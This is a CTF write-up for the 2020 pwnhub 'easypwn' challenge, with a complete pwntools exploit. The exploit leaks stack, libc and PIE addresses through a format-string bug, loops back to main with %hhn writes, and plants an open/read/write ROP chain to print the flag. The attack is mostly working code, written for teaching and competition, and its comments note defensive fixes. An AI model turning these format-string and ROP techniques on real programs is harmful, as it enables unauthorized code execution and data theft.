2020 pwnhub 公开赛 -- easypwn

蛮有意思的一题：格式化字符串漏洞，0x18 个字节，2 次机会，数据写在栈上。

很显然需要构造循环，多次利用格式化字符串漏洞：第一次用来泄露地址，第二次修改返回地址为 main，回到 printf 处继续利用。

但是题目禁用了 execv，也就意味着需要通过 orw 去读取 flag，只能构造 rop 了。用 printf 去写 rop 链，这也是比较有意思的地方：每一次回到 printf 处都有两次任意地址写的机会，一次需要用来修改返回地址，第二次就可以用来写 rop 了，这个 rop 写到 main 的返回地址处即可。

#coding:utf-8
from pwn import *
import sys

local = 1
context.terminal = ['tmux', 'splitw', '-h']
# A single "DEBUG"/"debug" argument switches pwntools to verbose I/O logging.
if len(sys.argv) == 2 and sys.argv[1] in ('DEBUG', 'debug'):
    context.log_level = 'debug'

# Target selection: local=1 spawns the binary, otherwise connect to the
# host/port recorded in the writeup.  The ELF and its libc are loaded the
# same way in both cases.
if local:
    p = process('./easypwn')
else:
    p = remote("139.217.102.146", "33865")
elf = ELF('./easypwn', checksec=False)
libc = elf.libc

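# Breakpoint helper that accounts for address-space randomisation (PIE).
def debug(addr=0, PIE=True):
    """Attach gdb to the target process with a single breakpoint.

    Args:
        addr: breakpoint address.  With PIE=True it is an offset inside the
            main image and is rebased on the process's first mapping.
        PIE: whether *addr* is an image-relative offset.
    """
    if not PIE:
        gdb.attach(p, "b *{}".format(hex(addr)))
        return
    # readlines()[1] skips pmap's header line; the first mapping is taken as
    # the image base.  p.pid is an int, so the shell string is not
    # attacker-influenced; the handle is closed explicitly.
    with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as maps:
        text_base = int(maps.readlines()[1], 16)
    breakpoint_addr = text_base + addr
    # Report the breakpoint that is actually installed, together with the
    # base it was rebased from, so the log matches what gdb does.
    print("text_base --> " + hex(text_base) + ", breakpoint_addr --> " + hex(breakpoint_addr))
    gdb.attach(p, 'b *{}'.format(hex(breakpoint_addr)))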

# Thin wrappers over the tube; `p` is resolved at call time.
def sd(s):
    return p.send(s)


def rc(s):
    return p.recv(s)


def sl(s):
    return p.sendline(s)


def ru(s):
    return p.recvuntil(s)


def sda(a, s):
    return p.sendafter(a, s)


def sla(a, s):
    return p.sendlineafter(a, s)

def show(name, addr):
    """Log *addr* in hex under the label *name* through pwntools' logger."""
    label = name + " --> %s"
    log.info(label, hex(addr))


# stack ,libc ,text
# Root cause exercised here: the "name" input is passed to printf as the
# format string itself, so positional "%N$p" reads disclose stack slots and
# "%N$hhn" stores through an address taken from the stack.  The program-side
# fix is printf("%s", name); -Wformat-security flags such calls and glibc's
# _FORTIFY_SOURCE rejects %n in writable format strings.
pay = "%14$p-%19$p-%15$p"
sla("name?\n",pay)
# Slot 14: a stack address; every stack offset below is relative to it.
stack = int(ru('-')[:-1],16)
buf_stack = stack - 0x68
times_stack = stack - 8
main_ret_stack = stack + 8
# Slot 19: the return address into __libc_start_main.  240 is the distance
# of that call site from the symbol and presumably matches the libc shipped
# with the challenge — it must be re-derived for any other libc build.
libc_start_main = int(ru('-')[:-1],16)
libc_base = libc_start_main - 240 - libc.symbols['__libc_start_main']
# Slot 15: an address inside the text segment, 0xd4d past the PIE base.
text_base = int(ru('\n')[:-1],16) - 0xd4d

# Gadget offsets are specific to this binary and this libc build and have to
# be recomputed for a different one.
pop_rdi = text_base + 0xdd3
pop_rsi = 0x00000000000202f8 + libc_base
pop_rdx = 0x0000000000001b92 + libc_base
pop_rax = 0x000000000003a738 + libc_base
syscall_ret = 0x00000000000bc3f5 + libc_base
# presumably the global buffer the "name" prompt writes into (the final
# rounds send "flag\x00" there) — confirm against the binary.
flag_addr = text_base + 0x202084

show("stack",stack)
show("buf_stack",buf_stack)
show("main_ret_stack",main_ret_stack)
# show("times_stack",times_stack)
# show("libc_base",libc_base)
show("text_base",text_base)
# show("libc_start_main",libc_start_main)
show("pop_rdi",pop_rdi)

# 0x67616c66 is the little-endian encoding of the bytes "flag"; presumably
# the answer the second prompt expects — confirm against the binary.
sla("you??\n",str(0x67616c66))
# pause()
# Return to main.  NOTE(review): `main` itself is not referenced afterwards;
# the %hhn below rewrites only the low byte of the return address.
main = text_base + 0xd10
# presumably the saved return address of the function that calls printf.
ret_stack = stack - 0x18

# "%58c%10$hhn" plus "AAAAA" is exactly 16 bytes, so p64(ret_stack) sits at
# byte 16 of the input, where the author's "%10$" expects it.  %hhn stores
# the count of characters printed so far (58 = 0x3a) as a single byte into
# the return address's low byte.
pay = "%58c%10$hhnAAAAA"
pay += p64(ret_stack)
# debug(0xc6e)
sla("name?\n",pay)
sla("you??\n",str(0x67616c66))

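def change(addr, vaule):
    """Store the single byte *vaule* at *addr* via one "%hhn" round.

    Args:
        addr: target address, appended to the payload so "%10$" can reach it.
        vaule: byte value in the range 0..0xff.

    Raises:
        ValueError: if *vaule* does not fit in one byte; "%hhn" would
            otherwise store only the low byte silently.
    """
    if not 0 <= vaule <= 0xff:
        raise ValueError("change(): expected a byte value, got %r" % (vaule,))
    # %hhn writes the number of characters printed so far; a zero byte needs
    # exactly 256 characters, and 0x100 & 0xff == 0.
    count = 0x100 if vaule == 0 else vaule
    # Pad to 16 bytes so p64(addr) lands where "%10$" picks it up.
    pay = ("%" + str(count) + "c%10$hhn").ljust(0x10, "A")
    pay += p64(addr)
    sla("name?\n", pay)
    sla("you??\n", str(0x67616c66))

    # Second round of this iteration: point the saved return address back into
    # main so the next call to change() gets a fresh pair of inputs.
    pay = "%58c%10$hhnAAAAA"
    pay += p64(ret_stack)
    sla("name?\n", pay)
    sla("you??\n", str(0x67616c66))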

def write(target, vaule):
    """Store the 64-bit *vaule* at *target* little-endian, one byte per change() round."""
    lsb_first = [(vaule >> shift) & 0xff for shift in range(0, 64, 8)]
    for offset, byte in enumerate(lsb_first):
        change(target + offset, byte)

# execv is disabled by the challenge, so the chain issues open/read/write
# syscalls directly (the "orw" pattern).  Defender note: a filter that
# denies only execve does not stop this; an allow-list of the syscalls the
# program actually needs is the robust form.
rop_chain = [
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rax, 2,
    syscall_ret,            # open("flag")
    pop_rdi, 3,
    pop_rsi, flag_addr,
    pop_rdx, 0x30,
    pop_rax, 0,
    syscall_ret,            # read(3, flag_addr, 0x30)
    pop_rdi, 1,
    pop_rsi, flag_addr,
    pop_rdx, 0x30,
    pop_rax, 1,
    syscall_ret,            # write(1, flag_addr, 0x30)
]
# One qword per slot, starting at main's saved return address.
for slot, qword in enumerate(rop_chain):
    write(main_ret_stack + 8 * slot, qword)

# Two plain rounds with no '%' in the input: the format string is inert, so
# the function returns normally and the chain takes over.
for _ in range(2):
    sla("name?\n", "flag\x00"*4 + 'aaa')
    sla("you??\n", str(0x67616c66))

# debug()

p.interactive()